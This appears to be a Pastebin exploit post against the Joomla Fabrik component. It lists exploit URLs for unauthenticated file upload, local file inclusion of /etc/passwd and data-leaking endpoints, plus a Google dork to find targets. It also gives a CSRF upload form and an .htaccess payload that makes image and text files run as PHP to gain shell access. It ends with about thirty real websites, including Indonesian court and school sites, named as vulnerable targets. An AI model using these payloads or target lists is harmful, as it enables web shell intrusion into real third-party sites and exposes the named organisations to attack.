API tools faq
paste
KingSkrupellos

Joomla Com_Fabrik Multiple Vulnerabilities 28/11/2018

KingSkrupellos
Nov 28th, 2018
234
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.36 KB | None | 0 0
raw download clone embed print report
  1. #################################################################################################
  2.  
  3. # Exploit Title : Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 29/11/2018
  6. # Vendor Homepage : extensions.joomla.org/extension/fabrik/ ~ fabrikar.com
  7. # Tested On : Windows and Linux
  8. # Software Download Links : fabrikar.com/downloads
  9. # Category : WebApps
  10. # Version Information : All Current Versions.
  11. # Google Dorks : inurl:''/index.php?option=com_fabrik''
  12. # Exploit Risk : Medium
  13. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  14. + CWE-434 - [ Unrestricted Upload of File with Dangerous Type PHP ]
  15.  
  16. #################################################################################################
  17.  
  18. # Exploit Title : Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability
  19.  
  20. # Admin Panel Login Path :
  21.  
  22. /administrator/
  23.  
  24. #################################################################################################
  25.  
  26. # Exploit 1 :
  27.  
  28. /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  29.  
  30. # Error :
  31.  
  32. {"filepath":null,"uri":null}
  33.  
  34. {"error":"Error. Unable to upload file."}
  35.  
  36. #################################################################################################
  37.  
  38. # Exploit 2 :
  39.  
  40. /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
  41.  
  42. /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0
  43.  
  44. Directory File Path : /media/...
  45.  
  46. #################################################################################################
  47.  
  48. # Exploit 3 :
  49.  
  50. /index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=11
  51.  
  52. /index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=
  53. 12&nextview=list&scope=com_fabrik&tkn=[RANDOM-HASH-NUMBERS]
  54.  
  55. Add and Delete Vulnerability
  56.  
  57. Note : If websites says while exploiting the code like this '' Sorry this form is not published ''. It is not vulnerable. Bugs Fixed.
  58.  
  59. #################################################################################################
  60.  
  61. # Exploit 4 :
  62.  
  63. /component/fabrik/form/8/index.php?option=com_fabrik&format=raw&controller=plugin&c=plugin&task=userAjax&method=getprodimg
  64.  
  65. # Example Error :
  66.  
  67. {"id":8,"model":"table","errors":[],"data":{"___betrieb":[""],"___modell":"","___betreff":"Probefahrt","___firma":"","
  68. ___anrede":["0"],"___name":"","___email":"",
  69. "___strasse":"","___plz":"","___ort":"","___telefon":"","___bemerkungen":"","___empfaenger":"","___captcha":"","
  70. ___datenschutz":[""]},"html":{"___betrieb":"\r\n","___modell":"","___betreff":"<!-- Probefahrt -->","___firma":"",
  71. "___anrede":"bitte wählen","___name":"","___email":"","___strasse":"","___plz":"","___ort":"","___telefon":"",
  72. "___bemerkungen":"","___empfaenger":"<!-- -->","___captcha":"","___datenschutz":""},"post":
  73. {"option":"com_fabrik","format":"raw","controller":"plugin","c":"plugin","task":"userAjax","method":
  74. "getprodimg\\","Itemid":null,"view":"form","formid":"8","rowid":"index"}}
  75.  
  76. #################################################################################################
  77.  
  78. # Exploit 5 :
  79.  
  80. /index.php?option=com_fabrik&controller=[Local File Inclusion]
  81.  
  82. /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00
  83.  
  84. Note : If says while exploiting the code '' 0 Call to a member function getData() on null ''. It means that the vulnerability has been fixed.
  85.  
  86. #################################################################################################
  87.  
  88. # CSRF Exploiter Code => [ Upload Htaccess File via This Script ] - Save this file as [yourfilename].html
  89.  
  90. <title>KingSkrupellos - Cyberizm Digital Security Team</title>
  91. <br>
  92. <br>
  93. <font size="10">Joomla CSRF Com_Fabrik File Upload Shell Access Exploiter</h1><br><br>
  94. <form method="POST" action="http://www.[TARGETSITE]/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
  95. <input type="file" name="file"><button>OKAY</button>
  96. </form>
  97. </center><br></font>
  98.  
  99. #################################################################################################
  100.  
  101. # HtAccess File =>
  102.  
  103. DirectoryIndex cyberizm.html
  104. AddType application/x-httpd-php .png
  105. AddType application/x-httpd-php .gif
  106. AddType application/x-httpd-php .jpg
  107. AddType application/x-httpd-php .txt
  108. AddType application/x-httpd-php .fla
  109. AddType application/x-httpd-php .php
  110. AddType application/x-httpd-php .asp
  111. AddType application/x-httpd-php .js
  112. AddType application/x-httpd-php .shtml
  113. AddType application/x-httpd-php .html
  114. AddType application/x-httpd-php .htm
  115.  
  116. # or you can use this
  117.  
  118. DirectoryIndex index.html
  119. AddType application/x-httpd-php .png
  120. AddType application/x-httpd-php .txt
  121. AddType application/x-httpd-php .fla
  122.  
  123. #################################################################################################
  124.  
  125. # Exploit 1 => Example Successfull Attack Scenario =>
  126.  
  127. {"filepath":"\/.htaccess","uri":"http:\/\/pn-kebumen.go.id\/.htaccess"}
  128.  
  129. # Shell Access Path : TARGETDOMAIN/media/[YOURSHELLNAMEHERE.php]
  130.  
  131. #################################################################################################
  132.  
  133. # Example Vulnerable Sites =>
  134.  
  135. [+] pn-kebumen.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  136.  
  137. [+] pn-jeneponto.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  138.  
  139. [+] pn-sidikalang.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  140.  
  141. [+] pn-parepare.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  142.  
  143. [+] pn-balige.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  144.  
  145. [+] ticketexchange.co.il/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  146.  
  147. [+] tiwc.gr/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  148.  
  149. [+] labelchip.it/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  150.  
  151. [+] halaimemon.org/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=11
  152.  
  153. [+] dakotahistory.org/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=
  154. component&listid=12&nextview=list&scope=com_fabrik&tkn=
  155.  
  156. [+] volkswagen-automobile-berlin.de/component/fabrik/form/8/index.php?option=com_fabrik&format=raw&controller=
  157. plugin&c=plugin&task=userAjax&method=getprodimg
  158.  
  159. [+] cyo-no.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  160.  
  161. [+] tchoukball.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  162.  
  163. [+] lluisoshorta.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  164.  
  165. [+] bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0
  166.  
  167. [+] aswc.seagrant.uaf.edu/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  168.  
  169. [+] wildwood.edu/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  170.  
  171. [+] bnetrust.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  172.  
  173. [+] seadfoundation.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  174.  
  175. [+] edim.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload&lang=fr
  176.  
  177. [+] tpacharterschool.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  178.  
  179. [+] delamoflyers.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  180.  
  181. [+] mairie-orsay.fr/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  182.  
  183. [+] cfh-aih.fr/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  184.  
  185. [+] industriesalon.de/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  186.  
  187. [+] ostbayern-kurier.de/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  188.  
  189. [+] wanzenschreck.de/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  190.  
  191. [+] traditionalscouting.co.uk/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  192.  
  193. [+] kabin.no/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  194.  
  195. [+] bcsd.us/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  196.  
  197. #################################################################################################
  198.  
  199. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  200.  
  201. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!